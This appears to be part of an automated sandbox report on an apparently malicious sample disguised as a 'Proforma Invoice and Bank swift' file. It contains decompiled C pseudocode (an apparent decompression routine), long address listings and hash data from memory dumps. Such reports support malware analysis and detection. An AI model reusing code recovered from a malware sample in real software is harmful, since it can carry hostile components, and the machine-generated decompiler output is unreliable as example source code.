										_v16 = _v16 - __edx;
										__ebx = 1;
										__ecx = _v76;
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx = _v72;
										__ebx = _v72 | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										_v72 = __ebx;
										 *__esi = __ax;
										_v84 = __edi;
									} else {
										_v20 = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										_v84 = _v84 << 1;
										 *__esi = __dx;
									}
									__eflags = _v20 - 0x1000000;
									if(_v20 >= 0x1000000) {
										L114:
										_t374 =  &_v76;
										 *_t374 = _v76 + 1;
										__eflags =  *_t374;
										goto L115;
									} else {
										goto L112;
									}
								}
								__ecx = _v16;
								__ebx = __ebx + __ebx;
								_v20 = _v20 >> 1;
								__eflags = _v16 - _v20;
								_v72 = __ebx;
								if(_v16 >= _v20) {
									__ecx = _v20;
									_v16 = _v16 - _v20;
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									_v72 = __ebx;
								}
								__eflags = _v20 - 0x1000000;
								if(_v20 >= 0x1000000) {
									L104:
									_t344 =  &_v76;
									 *_t344 = _v76 - 1;
									__eflags =  *_t344;
									goto L105;
								} else {
									goto L102;
								}
							}
							__edx = _v8;
							__eax = __eax - __ebx;
							_v68 = __ecx;
							__eax = _v8 + 0x55e + __eax * 2;
							goto L111;
						case 0x1a:
							L58:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1a;
								goto L173;
							}
							__ecx = _v108;
							__al = _v96;
							__edx = _v12;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_v104 = _v104 - 1;
							 *_v108 = __al;
							__ecx = _v24;
							 *(_v12 + __ecx) = __al;
							__eax = __ecx + 1;
							__edx = 0;
							_t197 = __eax % _v120;
							__eax = __eax / _v120;
							__edx = _t197;
							goto L82;
						case 0x1b:
							L78:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1b;
								goto L173;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__edx = _v12;
							__cl =  *(__edx + __eax);
							__eax = _v24;
							_v96 = __cl;
							 *(__edx + __eax) = __cl;
							__eax = __eax + 1;
							__edx = 0;
							_t280 = __eax % _v120;
							__eax = __eax / _v120;
							__edx = _t280;
							__eax = _v108;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_t289 =  &_v104;
							 *_t289 = _v104 - 1;
							__eflags =  *_t289;
							 *_v108 = __cl;
							L82:
							_v24 = __edx;
							goto L83;
						case 0x1c:
							while(1) {
								L126:
								__eflags = _v104;
								if(_v104 == 0) {
									break;
								}
								__eax = _v24;
								__eax = _v24 - _v48;
								__eflags = __eax - _v120;
								if(__eax >= _v120) {
									__eax = __eax + _v120;
									__eflags = __eax;
								}
								__edx = _v12;
								__cl =  *(__edx + __eax);
								__eax = _v24;
								_v96 = __cl;
								 *(__edx + __eax) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t420 = __eax % _v120;
								__eax = __eax / _v120;
								__edx = _t420;
								__eax = _v108;
								_v108 = _v108 + 1;
								_v104 = _v104 - 1;
								_v52 = _v52 - 1;
								__eflags = _v52;
								 *_v108 = __cl;
								_v24 = _t420;
								if(_v52 > 0) {
									continue;
								} else {
									L83:
									_v140 = 2;
									goto L3;
								}
							}
							_v140 = 0x1c;
							L173:
							_push(0x22);
							_pop(_t574);
							memcpy(_v148,  &_v140, _t574 << 2);
							return 0;
					}
				}
				L174:
				_t538 = _t537 | 0xffffffff;
				return _t538;
			}

0x00405f92
0x00405f99
0x00405f9f
0x00405fa5
0x00000000
0x00405fa9
0x00405fb5
0x00405fb5
0x00405fb5
0x00405fbe
0x00000000
0x00000000
0x00405fc4
0x00000000
0x00405fcb
0x00405fcf
0x00000000
0x00000000
0x00405fd8
0x00405fdb
0x00405fde
0x00405fe0
0x00405fe2
0x00000000
0x00000000
0x00405fe8
0x00405feb
0x00405fed
0x00405fee
0x00405ff1
0x00405ff3
0x00405ff4
0x00405ff6
0x00405ff9
0x00405ffe
0x00406003
0x0040600c
0x0040601f
0x00406022
0x0040602b
0x0040602e
0x00406056
0x00406056
0x00406058
0x00406066
0x00406066
0x0040606a
0x00000000
0x00000000
0x00000000
0x00000000
0x0040605a
0x0040605a
0x0040605d
0x0040605d
0x0040605e
0x0040605e
0x00000000
0x0040605a
0x00406030
0x00406034
0x00406039
0x00406039
0x00406042
0x00406048
0x0040604a
0x0040604d
0x00000000
0x00406053
0x00406053
0x00000000
0x00406053
0x00000000
0x00406070
0x00406070
0x00406074
0x00406920
0x00000000
0x00406920
0x0040607d
0x0040608d
0x00406090
0x00406093
0x00406093
0x00406093
0x00406096
0x00406096
0x0040609a
0x00000000
0x00000000
0x0040609c
0x0040609f
0x004060a2
0x004060cc
0x004060d2
0x004060d9
0x00000000
0x004060d9
0x004060a4
0x004060a8
0x004060ab
0x004060b0
0x004060b0
0x004060bb
0x004060c1
0x004060c3
0x004060c6
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040610b
0x00406111
0x00406114
0x00406121
0x00406129
0x00000000
0x00000000
0x004060e0
0x004060e0
0x004060e4
0x0040692f
0x00000000
0x0040692f
0x004060f0
0x004060fb
0x004060fb
0x004060fb
0x004060fe
0x00406101
0x00406104
0x00406107
0x00406109
0x00000000
0x00000000
0x00000000
0x00000000
0x004067a0
0x004067a0
0x004067a6
0x004067ac
0x004067af
0x004067b2
0x004067cc
0x004067cf
0x004067d5
0x004067e0
0x004067e0
0x004067e2
0x004067b4
0x004067b4
0x004067c3
0x004067c7
0x004067c7
0x004067e5
0x004067ec
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004067ee
0x004067ee
0x004067f2
0x004069a1
0x00000000
0x004069a1
0x004067fe
0x00406805
0x0040680d
0x0040680d
0x0040680d
0x00406810
0x00406813
0x00406813
0x00000000
0x00000000
0x00406131
0x00406133
0x00406136
0x004061a7
0x004061aa
0x004061ad
0x004061b4
0x004061be
0x00000000
0x004061be
0x00406138
0x0040613c
0x0040613f
0x00406141
0x00406144
0x00406147
0x00406149
0x0040614c
0x0040614e
0x00406153
0x00406156
0x00406159
0x0040615d
0x00406164
0x00406167
0x0040616e
0x00406172
0x0040617a
0x0040617a
0x0040617a
0x00406174
0x00406174
0x00406174
0x00406169
0x00406169
0x00406169
0x0040617e
0x00406181
0x0040619f
0x004061a1
0x00000000
0x004061a1
0x00406183
0x00406186
0x00406189
0x0040618c
0x0040618e
0x0040618e
0x0040618e
0x00406191
0x00406194
0x00406196
0x00406197
0x0040619a
0x00000000
0x00000000
0x004063d0
0x004063d4
0x004063f2
0x004063f5
0x004063fc
0x004063ff
0x00406402
0x00406405
0x00406408
0x0040640b
0x0040640d
0x00406414
0x00406415
0x00406417
0x0040641a
0x0040641d
0x00406420
0x00406420
0x00406425
0x00000000
0x00406425
0x004063d6
0x004063d9
0x004063dc
0x004063e6
0x00000000
0x00000000
0x0040643a
0x0040643e
0x00406461
0x00406464
0x00406467
0x00406471
0x00406440
0x00406440
0x00406443
0x00406446
0x00406449
0x00406456
0x00406459
0x00406459
0x00000000
0x00000000
0x0040647d
0x00406481
0x00000000
0x00000000
0x00406487
0x0040648b
0x00000000
0x00000000
0x00406491
0x00406493
0x00406497
0x00406497
0x0040649a
0x0040649e
0x00000000
0x00000000
0x004064ee
0x004064f2
0x004064f9
0x004064fc
0x004064ff
0x00406509
0x00000000
0x00406509
0x004064f4
0x00000000
0x00000000
0x00406515
0x00406519
0x00406520
0x00406523
0x00406526
0x0040651b
0x0040651b
0x0040651b
0x00406529
0x0040652c
0x0040652f
0x0040652f
0x00406532
0x00406535
0x00406538
0x00406538
0x0040653b
0x00406542
0x00406547
0x00000000
0x00000000
0x004065d5
0x004065d5
0x004065d9
0x00406977
0x00000000
0x00406977
0x004065df
0x004065e2
0x004065e5
0x004065e9
0x004065ec
0x004065f2
0x004065f4
0x004065f4
0x004065f4
0x004065f7
0x004065fa
0x00000000
0x00000000
0x004061ca
0x004061ca
0x004061ce
0x0040693b
0x00000000
0x0040693b
0x004061d4
0x004061d7
0x004061da
0x004061de
0x004061e1
0x004061e7
0x004061e9
0x004061e9
0x004061e9
0x004061ec
0x004061ef
0x004061ef
0x004061f2
0x004061f5
0x00000000
0x00000000
0x004061fb
0x00406201
0x00000000
0x00000000
0x00406207
0x00406207
0x0040620b
0x0040620e
0x00406211
0x00406214
0x00406217
0x00406218
0x0040621b
0x0040621d
0x00406223
0x00406226
0x00406229
0x0040622c
0x0040622f
0x00406232
0x00406235
0x00406251
0x00406254
0x00406257
0x0040625a
0x00406261
0x00406265
0x00406267
0x0040626b
0x00406237
0x00406237
0x0040623b
0x00406243
0x00406248
0x0040624a
0x0040624c
0x0040624c
0x0040626e
0x00406275
0x00406278
0x00000000
0x0040627e
0x00000000
0x0040627e
0x00000000
0x00406283
0x00406283
0x00406287
0x00406947
0x00000000
0x00406947
0x0040628d
0x00406290
0x00406293
0x00406297
0x0040629a
0x004062a0
0x004062a2
0x004062a2
0x004062a2
0x004062a5
0x004062a8
0x004062a8
0x004062a8
0x004062ae
0x00000000
0x00000000
0x004062b0
0x004062b3
0x004062b6
0x004062b9
0x004062bc
0x004062bf
0x004062c2
0x004062c5
0x004062c8
0x004062cb
0x004062ce
0x004062e6
0x004062e9
0x004062ec
0x004062ef
0x004062ef
0x004062f2
0x004062f6
0x004062f8
0x004062d0
0x004062d0
0x004062d8
0x004062dd
0x004062df
0x004062e1
0x004062e1
0x004062fb
0x00406302
0x00406305
0x00000000
0x00406307
0x00000000
0x00406307
0x00406305
0x0040630c
0x0040630c
0x0040630c
0x0040630c
0x00000000
0x00000000
0x00406347
0x00406347
0x0040634b
0x00406953
0x00000000
0x00406953
0x00406351
0x00406354
0x00406357
0x0040635b
0x0040635e
0x00406364
0x00406366
0x00406366
0x00406366
0x00406369
0x0040636c
0x0040636c
0x00406372
0x00406310
0x00406310
0x00406313
0x00000000
0x00406313
0x00406374
0x00406374
0x00406377
0x0040637a
0x0040637d
0x00406380
0x00406383
0x00406386
0x00406389
0x0040638c
0x0040638f
0x00406392
0x004063aa
0x004063ad
0x004063b0
0x004063b3
0x004063b3
0x004063b6
0x004063ba
0x004063bc
0x00406394
0x00406394
0x0040639c
0x004063a1
0x004063a3
0x004063a5
0x004063a5
0x004063bf
0x004063c6
0x004063c9
0x00000000
0x004063cb
0x00000000
0x004063cb
0x00000000
0x00406658
0x00406658
0x0040665c
0x00406983
0x00000000
0x00406983
0x00406662
0x00406665
0x00406668
0x0040666c
0x0040666f
0x00406675
0x00406677
0x00406677
0x00406677
0x0040667a
0x00000000
0x00000000
0x00406428
0x00406428
0x0040642b
0x00000000
0x00000000
0x00406767
0x0040676b
0x0040678d
0x00406790
0x0040679a
0x0040679d
0x0040679d
0x00000000
0x0040679d
0x0040676d
0x00406770
0x00406774
0x00406777
0x00406777
0x0040677a
0x00000000
0x00000000
0x00406824
0x00406828
0x00406846
0x00406846
0x00406846
0x0040684d
0x00406854
0x0040685b
0x0040685b
0x00000000
0x0040685b
0x0040682a
0x0040682d
0x00406830
0x00406833
0x0040683a
0x0040677e
0x0040677e
0x00406781
0x00000000
0x00000000
0x00406915
0x00406918
0x00000000
0x00000000
0x0040654f
0x00406551
0x00406558
0x00406559
0x0040655b
0x0040655e
0x00000000
0x00000000
0x00406566
0x00406569
0x0040656c
0x0040656e
0x00406570
0x00406570
0x00406571
0x00406574
0x0040657b
0x0040657e
0x0040658c
0x00000000
0x00000000
0x00406862
0x00406862
0x00406865
0x0040686c
0x00000000
0x00000000
0x00406871
0x00406871
0x00406875
0x004069ad
0x00000000
0x004069ad
0x0040687b
0x0040687e
0x00406881
0x00406885
0x00406888
0x0040688e
0x00406890
0x00406890
0x00406890
0x00406893
0x00406896
0x00406896
0x00406896
0x00406896
0x00406899
0x00406899
0x0040689d
0x004068fd
0x00406900
0x00406905
0x00406906
0x00406908
0x0040690a
0x0040690d
0x00406819
0x00406819
0x00000000
0x00406819
0x0040689f
0x004068a5
0x004068a8
0x004068ab
0x004068ae
0x004068b1
0x004068b4
0x004068b7
0x004068ba
0x004068bd
0x004068c0
0x004068d9
0x004068dc
0x004068df
0x004068e2
0x004068e6
0x004068e8
0x004068e8
0x004068e9
0x004068ec
0x004068c2
0x004068c2
0x004068ca
0x004068cf
0x004068d1
0x004068d4
0x004068d4
0x004068ef
0x004068f6
0x00000000
0x004068f8
0x00000000
0x004068f8
0x00000000
0x00406594
0x00406597
0x004065cd
0x004066fd
0x004066fd
0x004066fd
0x004066fd
0x00406700
0x00406700
0x00406703
0x00406705
0x0040698f
0x00000000
0x0040698f
0x0040670b
0x0040670e
0x00000000
0x00000000
0x00406714
0x00406718
0x0040671b
0x0040671b
0x0040671b
0x00000000
0x0040671b
0x00406599
0x0040659b
0x0040659d
0x0040659f
0x004065a2
0x004065a3
0x004065a5
0x004065a7
0x004065aa
0x004065ad
0x004065c3
0x004065c8
0x00406600
0x00406600
0x00406604
0x00406630
0x00406632
0x00406639
0x0040663c
0x0040663f
0x0040663f
0x00406644
0x00406644
0x00406646
0x00406649
0x00406650
0x00406653
0x00406680
0x00406680
0x00406683
0x00406686
0x004066fa
0x004066fa
0x004066fa
0x00000000
0x004066fa
0x00406688
0x0040668e
0x00406691
0x00406694
0x00406697
0x0040669a
0x0040669d
0x004066a0
0x004066a3
0x004066a6
0x004066a9
0x004066c2
0x004066c4
0x004066c7
0x004066c8
0x004066cb
0x004066cd
0x004066d0
0x004066d2
0x004066d4
0x004066d7
0x004066d9
0x004066dc
0x004066e0
0x004066e2
0x004066e2
0x004066e3
0x004066e6
0x004066e9
0x004066ab
0x004066ab
0x004066b3
0x004066b8
0x004066ba
0x004066bd
0x004066bd
0x004066ec
0x004066f3
0x0040667d
0x0040667d
0x0040667d
0x0040667d
0x00000000
0x004066f5
0x00000000
0x004066f5
0x004066f3
0x00406606
0x00406609
0x0040660b
0x0040660e
0x00406611
0x00406614
0x00406616
0x00406619
0x0040661c
0x0040661c
0x0040661f
0x0040661f
0x00406622
0x00406629
0x004065fd
0x004065fd
0x004065fd
0x004065fd
0x00000000
0x0040662b
0x00000000
0x0040662b
0x00406629
0x004065af
0x004065b2
0x004065b4
0x004065b7
0x00000000
0x00000000
0x00406316
0x00406316
0x0040631a
0x0040695f
0x00000000
0x0040695f
0x00406320
0x00406323
0x00406326
0x00406329
0x0040632c
0x0040632f
0x00406332
0x00406334
0x00406337
0x0040633a
0x0040633d
0x0040633f
0x0040633f
0x0040633f
0x00000000
0x00000000
0x004064a1
0x004064a1
0x004064a5
0x0040696b
0x00000000
0x0040696b
0x004064ab
0x004064ae
0x004064b1
0x004064b4
0x004064b6
0x004064b6
0x004064b6
0x004064b9
0x004064bc
0x004064bf
0x004064c2
0x004064c5
0x004064c8
0x004064c9
0x004064cb
0x004064cb
0x004064cb
0x004064ce
0x004064d1
0x004064d4
0x004064d7
0x004064d7
0x004064d7
0x004064da
0x004064dc
0x004064dc
0x00000000
0x00000000
0x0040671e
0x0040671e
0x0040671e
0x00406722
0x00000000
0x00000000
0x00406728
0x0040672b
0x0040672e
0x00406731
0x00406733
0x00406733
0x00406733
0x00406736
0x00406739
0x0040673c
0x0040673f
0x00406742
0x00406745
0x00406746
0x00406748
0x00406748
0x00406748
0x0040674b
0x0040674e
0x00406751
0x00406754
0x00406757
0x0040675b
0x0040675d
0x00406760
0x00000000
0x00406762
0x004064df
0x004064df
0x00000000
0x004064df
0x00406760
0x00406995
0x004069b7
0x004069bd
0x004069bf
0x004069c6
0x00000000
0x00000000
0x00405fc4
0x004069cc
0x004069cc
0x00000000

Memory Dump Source

Source File: 00000000.00000002.654566906.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.654562439.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.654579328.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.654593443.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654640904.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654653307.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654659682.000000000042C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c94337aa44be19872a05e7fe324c1f72408cb83bc4afcb37e89916e28dd5cdb7
Instruction ID: 3ccfc7c80e99de65fa6db0e0edc8679980b1d0ea62cd2807200041591328ae3c
Opcode Fuzzy Hash: c94337aa44be19872a05e7fe324c1f72408cb83bc4afcb37e89916e28dd5cdb7
Instruction Fuzzy Hash: D98187B1D00229CBDF24CFA8C8447AEBBB1FB44305F11816AD856BB2C1C7785A96CF44

Uniqueness

Uniqueness Score: -1.00%

Function 004063D0, Relevance: 5.2, APIs: 4, Instructions: 180
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E004063D0() {
				signed int _t539;
				unsigned short _t540;
				signed int _t541;
				void _t542;
				signed int _t543;
				signed int _t544;
				signed int _t573;
				signed int _t576;
				signed int _t597;
				signed int* _t614;
				void* _t621;

				L0:
				while(1) {
					L0:
					if( *(_t621 - 0x40) != 1) {
						 *((intOrPtr*)(_t621 - 0x80)) = 0x16;
						 *((intOrPtr*)(_t621 - 0x20)) =  *((intOrPtr*)(_t621 - 0x24));
						 *((intOrPtr*)(_t621 - 0x24)) =  *((intOrPtr*)(_t621 - 0x28));
						 *((intOrPtr*)(_t621 - 0x28)) =  *((intOrPtr*)(_t621 - 0x2c));
						 *(_t621 - 0x38) = ((0 |  *(_t621 - 0x38) - 0x00000007 >= 0x00000000) - 0x00000001 & 0x000000fd) + 0xa;
						_t539 =  *(_t621 - 4) + 0x664;
						 *(_t621 - 0x58) = _t539;
						goto L68;
					} else {
						 *(__ebp - 0x84) = 8;
						while(1) {
							L132:
							 *(_t621 - 0x54) = _t614;
							while(1) {
								L133:
								_t540 =  *_t614;
								_t597 = _t540 & 0x0000ffff;
								_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
								if( *(_t621 - 0xc) >= _t573) {
									 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
									 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
									 *(_t621 - 0x40) = 1;
									_t541 = _t540 - (_t540 >> 5);
									 *_t614 = _t541;
								} else {
									 *(_t621 - 0x10) = _t573;
									 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
									 *_t614 = (0x800 - _t597 >> 5) + _t540;
								}
								if( *(_t621 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t621 - 0x6c) == 0) {
									 *(_t621 - 0x88) = 5;
									L170:
									_t576 = 0x22;
									memcpy( *(_t621 - 0x90), _t621 - 0x88, _t576 << 2);
									_t544 = 0;
									L172:
									return _t544;
								}
								 *(_t621 - 0x10) =  *(_t621 - 0x10) << 8;
								 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
								 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
								 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
								L139:
								_t542 =  *(_t621 - 0x84);
								while(1) {
									 *(_t621 - 0x88) = _t542;
									while(1) {
										L1:
										_t543 =  *(_t621 - 0x88);
										if(_t543 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t543 * 4 +  &M004069D4))) {
											case 0:
												if( *(_t621 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t543 =  *( *(_t621 - 0x70));
												if(_t543 > 0xe1) {
													goto L171;
												}
												_t547 = _t543 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t578);
												_push(9);
												_pop(_t579);
												_t617 = _t547 / _t578;
												_t549 = _t547 % _t578 & 0x000000ff;
												asm("cdq");
												_t612 = _t549 % _t579 & 0x000000ff;
												 *(_t621 - 0x3c) = _t612;
												 *(_t621 - 0x1c) = (1 << _t617) - 1;
												 *((intOrPtr*)(_t621 - 0x18)) = (1 << _t549 / _t579) - 1;
												_t620 = (0x300 << _t612 + _t617) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t621 - 0x78))) {
													L10:
													if(_t620 == 0) {
														L12:
														 *(_t621 - 0x48) =  *(_t621 - 0x48) & 0x00000000;
														 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t620 = _t620 - 1;
														 *((short*)( *(_t621 - 4) + _t620 * 2)) = 0x400;
													} while (_t620 != 0);
													goto L12;
												}
												if( *(_t621 - 4) != 0) {
													GlobalFree( *(_t621 - 4));
												}
												_t543 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t621 - 4) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t621 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 1;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x40) =  *(_t621 - 0x40) | ( *( *(_t621 - 0x70)) & 0x000000ff) <<  *(_t621 - 0x48) << 0x00000003;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t45 = _t621 - 0x48;
												 *_t45 =  *(_t621 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t621 - 0x48) < 4) {
													goto L13;
												}
												_t555 =  *(_t621 - 0x40);
												if(_t555 ==  *(_t621 - 0x74)) {
													L20:
													 *(_t621 - 0x48) = 5;
													 *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) =  *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t621 - 0x74) = _t555;
												if( *(_t621 - 8) != 0) {
													GlobalFree( *(_t621 - 8));
												}
												_t543 = GlobalAlloc(0x40,  *(_t621 - 0x40)); // executed
												 *(_t621 - 8) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t562 =  *(_t621 - 0x60) &  *(_t621 - 0x1c);
												 *(_t621 - 0x84) = 6;
												 *(_t621 - 0x4c) = _t562;
												_t614 =  *(_t621 - 4) + (( *(_t621 - 0x38) << 4) + _t562) * 2;
												goto L132;
											case 3:
												L21:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 3;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												_t67 = _t621 - 0x70;
												 *_t67 =  &(( *(_t621 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
												L23:
												 *(_t621 - 0x48) =  *(_t621 - 0x48) - 1;
												if( *(_t621 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t540 =  *_t614;
												_t597 = _t540 & 0x0000ffff;
												_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
												if( *(_t621 - 0xc) >= _t573) {
													 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
													 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
													 *(_t621 - 0x40) = 1;
													_t541 = _t540 - (_t540 >> 5);
													 *_t614 = _t541;
												} else {
													 *(_t621 - 0x10) = _t573;
													 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
													 *_t614 = (0x800 - _t597 >> 5) + _t540;
												}
												if( *(_t621 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												goto L0;
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t258 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t258;
												0 | _t258 = _t258 + _t258 + 9;
												 *(__ebp - 0x38) = _t258 + _t258 + 9;
												goto L75;
											case 0xa:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xb;
													__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x28);
												goto L88;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												L88:
												__ecx =  *(__ebp - 0x2c);
